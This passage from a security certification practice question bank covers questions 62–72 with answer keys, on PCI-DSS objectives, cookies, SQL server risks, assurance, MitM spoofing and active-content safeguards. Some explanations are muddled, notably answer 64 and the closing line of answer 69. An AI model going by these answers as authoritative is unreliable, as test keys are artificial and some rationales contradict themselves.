62. c. Layered security protections (defense-in-depth) can be installed to prevent exploitability. Architectural system design can also help prevent exploitability. Layered security protections include least privilege, object reuse, process separation, modularity, and trusted systems. The other three choices do not provide best remedy.
63. For the payment card industry data security standard (PCI-DSS), which of the following security controls cannot meet the control objectives of building and maintaining a secure network?
a. Install firewall configurations.
b. Do not use defaults for system passwords.
c. Encrypt transmission of cardholder data.
d. Do not use defaults for security parameters.
63. c. The encryption of transmission of cardholder data across open, public networks meets a different control objective of protecting cardholder data, not the control objective of building and maintaining a secure network. The other three choices meet the objective of building and maintaining a secure network.
64. For the payment card industry data security standard (PCI-DSS), which of the following security controls cannot meet the control objective of maintaining a vulnerability management program?
a. Regularly update antivirus software.
b. Protect stored cardholder data.
c. Maintain secure operating systems.
d. Maintain secure application systems.
64. b. Protecting stored cardholder data meets a different control objective than protecting cardholder data, not the one in the question. The other three choices meet the control objective of maintaining a vulnerability management program.
65. Use of cookies on the Web raises which of the following?
a. Integrity issue
b. Privacy issue
c. Connectivity issue
d. Accountability issue
65. b. Cookies were invented to enable websites to remember its users from visit to visit. Because cookies collect personal information about the Web user, it raises privacy issues such as what information is collected and how it is used. Cookies do not raise integrity, connectivity, or accountability issues.
66. Which of the following is not a risk by itself for a Structured Query Language (SQL) server?
a. Concurrent transactions
b. Deadlock
c. Denial-of-service
d. Loss of data integrity
66. a. The concurrent transaction is not a risk by itself. The SQL server must ensure orderly access to data when concurrent transactions attempt to access and modify the same data. The SQL server must provide appropriate transaction management features to ensure that tables and elements within the tables are synchronized. The other three choices are risks resulting from handling concurrent transactions.
67. System assurance cannot be increased by which of the following?
a. Applying more complex technical solutions
b. Using more trustworthy components
c. Limiting the extent of a vulnerability
d. Installing nontechnical countermeasures
67. a. System assurance is grounds for confidence that an entity meets its security objectives as well as system characteristics that enable confidence that the system fulfills its intended purpose. Applying more complex technical solutions can create more complexity in implementing security controls. Simple solutions are better. The other three choices can increase system assurance.
68. Which of the following security services are applicable to the confidentiality security objective?
a. Prevention services
b. Detection services
c. Correction services
d. Recovery services
68. a. Only the prevention services are needed to maintain the confidentiality security objective. When lost, confidentiality cannot be restored. The other three choices do not apply to the confidentiality security objective.
69. The security services that provide for availability security objectives also provide for which of the following security objectives?
a. Integrity
b. Confidentiality
c. Accountability
d. Assurance
69. a. Examples of common security services between availability and integrity objectives include access authorization and access control enforcement.
The primary availability services are those that directly impact the ability of the system to maintain operational effectiveness. One aspect of maintaining operational effectiveness is protection from unauthorized changes or deletions by defining authorized access and enforcing access controls. Operational effectiveness is also maintained by detecting intrusions, detecting loss of wholeness, and providing the means of returning to a secure state.
The services that provide for availability also provide for integrity. This is because maintaining or restoring system integrity is an essential part of maintaining system availability.
By definition, integrity is the property that protected and sensitive data has not been modified or deleted in an unauthorized and undetected manner. By definition, availability means ensuring timely and reliable access to and use of data and information by authorized users. How is the data available to authorized users if it was deleted or destroyed?
The security services provided to fulfill the security objectives of availability, confidentiality, accountability, and assurance together have nothing in common.
70. Web spoofing using the man-in-the-middle attack is an example of which of the following?
a. Browser-oriented attacks
b. Server-oriented attacks
c. Network-oriented attacks
d. User-oriented attacks
70. c. An attacker can gain information by masquerading as a Web server using a man-in-the-middle (MitM) attack, whereby requests and responses are conveyed via the imposter as a watchful intermediary. Such a Web spoofing attack enables the imposter to shadow not only a single targeted server, but also every subsequent server accessed on the network.
71. To mitigate the risks of using active content, which of the following is an example of a technical safeguard?
a. Filters
b. Incident response handling
c. Security policy
d. Risk analysis
71. a. Filters can examine program code at points of entry and block or disable it if deemed harmful. Examples of filters include ingress filtering, egress filtering, and intrusion detection systems. The other three choices are examples of management and operational safeguards (controls).
72. To mitigate the risks of using active content, which of the following is an example of a technical safeguard?
a. Security audit
b. Evaluated technology
c. Application settings
d. Software cages